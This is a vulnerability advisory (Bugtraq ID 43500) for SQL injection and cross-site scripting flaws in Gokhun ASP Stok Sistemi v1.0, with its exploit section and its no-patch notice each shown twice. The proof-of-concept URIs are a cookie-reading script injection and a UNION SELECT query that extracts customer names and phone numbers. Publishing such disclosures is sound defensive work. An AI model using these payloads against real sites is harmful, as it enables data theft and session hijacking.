Gokhun ASP Stok Sistemi SQL Injection and Cross Site Scripting Vulnerabilities
BID:43500
Info
Gokhun ASP Stok Sistemi SQL Injection and Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 43500 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 26 2010 12:00AM |
| Updated: | Sep 26 2010 12:00AM |
| Credit: | KnocKout |
| Vulnerable: |
Gokhun ASP Stok Sistemi Gokhun ASP Stok Sistemi v1.0 |
| Not Vulnerable: | |
Exploit / POC
Gokhun ASP Stok Sistemi SQL Injection and Cross Site Scripting Vulnerabilities
An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
Cross Site Scripting:
http://www.example.com/?eylemD=hizmetlerimiz&olayD=digerhizmetlerimiz%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
SQL Injection:
http://www.example.com/?eylemD=urunler&olayD=&islemD=duzenle&kimlikD=1+union+select+0,1,name,ctelephone,4,5,6+from+customers+where+Kimlik=2
An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
Cross Site Scripting:
http://www.example.com/?eylemD=hizmetlerimiz&olayD=digerhizmetlerimiz%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
SQL Injection:
http://www.example.com/?eylemD=urunler&olayD=&islemD=duzenle&kimlikD=1+union+select+0,1,name,ctelephone,4,5,6+from+customers+where+Kimlik=2
Solution / Fix
Gokhun ASP Stok Sistemi SQL Injection and Cross Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].